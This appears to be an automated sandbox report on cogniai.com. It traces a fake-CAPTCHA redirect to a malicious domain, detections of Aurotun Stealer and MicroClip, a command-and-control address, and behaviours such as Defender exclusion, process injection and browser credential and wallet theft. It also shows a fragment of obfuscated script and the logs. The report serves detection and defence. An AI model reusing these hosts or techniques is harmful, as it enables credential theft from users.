Windows Analysis Report
HTTPS://cogniai.com

General Information

Sample URL:	HTTPS://cogniai.com
Analysis ID:	1701089
Infos:	yarasigma

Detection

Aurotun Stealer, CAPTCHA Scam ClickFix, MicroClip

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Sigma detected: msiexec download and execute

Suricata IDS alerts for network traffic

Yara detected Aurotun Stealer

Yara detected CAPTCHA Scam ClickFix

Yara detected MicroClip

Adds a directory exclusion to Windows Defender

Creates a thread in another existing process (thread injection)

Drops executables to the windows directory (C:\Windows) and starts them

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

HTML page adds supicious text to clipboard

HTML page contains obfuscated javascript

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Checks for available system drives (often done to infect USB drives)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Detected suspicious crossdomain redirect

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: MsiExec Web Install

Sigma detected: Msiexec Initiated Connection

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses cacls to modify the permissions of files

Yara signature match

Classification

Signatures

Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCE1CC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_2e64a555-3

Phishing

Yara detected CAPTCHA Scam ClickFix

Source: Yara match	File source: 1.21.o.script.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML

HTML page contains obfuscated javascript

Source: https://security.flaweguaard.com/?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n

HTTP Parser: (function(_0x44a4fe,_0x26438d){function _0xc2516c(_0x4d2ab2,_0x1c424f,_0x48d53b,_0x51657b,_0x5d6b73

Source: https://security.flaweguaard.com/?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n

HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.24:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.24:49731 version: TLS 1.2

Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: `\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb&l source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 4\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb,lg source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642B source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 2\??\C:\Users\user\AppData\Local\Temp\Win11Debloatrod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb3d8bbwe source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\Local State source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: chrome.exe, 00000000.00000002.2039759855.00000166927ED000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: h\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\Local Statef source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb)l` source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 9C:\Users\user\AppData\Local\Temp\Win11Debloat\d_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb=l source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642t source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\cal State\EBWebView source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State^ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb0447 source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbeData source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642\Local State source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: chrome.exe, 00000000.00000002.2039759855.00000166927ED000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb1.0-7e3544113374bc2769af5f67e125ab81de1b4b64c07fe68e2a7bc03646c85dfc source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb#lj source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21G source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: v\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbe source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642ate\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: >\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbRl} source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Creates COM task schedule object (often to register a task for autostart)

Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 6MB later: 78MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2061200 - Severity 1 - ET MALWARE Aurotun Stealer CnC Checkin : 192.168.2.24:49724 -> 91.200.14.69:7712

Detected suspicious crossdomain redirect

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

HTTP traffic: Redirect from: analytiscnode.com to https://security.flaweguaard.com/9a8b7c6d5e4f3a2b1c0d9e8f7a6b5c?wsid=cogniai.com&domain=y29nbmlhas5jb20%3d&link=ahr0chm6ly9jb2duawfplmnvbs93cc1jb250zw50l3vwbg9hzhmvmjaymy8xms90ahvtyl9dt0dosufjlunvbmnlchq5luzgltaxlteucg5n

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.24:59573 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.24:51544 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2061646 - Severity 2 - ET EXPLOIT_KIT Observed Fake Captcha Domain (analytiwave .com) in TLS SNI : 192.168.2.24:49696 -> 104.21.68.46:443
Source: Network traffic	Suricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.24:57274 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.24:51796 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2061646 - Severity 2 - ET EXPLOIT_KIT Observed Fake Captcha Domain (analytiwave .com) in TLS SNI : 192.168.2.24:49710 -> 172.67.186.167:443

Source: unknown	TCP traffic detected without corresponding DNS query: 13.69.109.130
Source: unknown	TCP traffic detected without corresponding DNS query: 13.69.109.130
Source: unknown	TCP traffic detected without corresponding DNS query: 13.69.109.130
Source: unknown	TCP traffic detected without corresponding DNS query: 13.69.109.130
Source: unknown	TCP traffic detected without corresponding DNS query: 13.69.109.130
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 13.69.109.130
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 13.69.109.130
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.200.14.69

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1host: cogniai.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /wp-includes/css/dist/block-library/style.min.css?ver=6.8.1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.8 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.5 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/css/fancybox.min.css?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/techze/css/icon-font.css?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
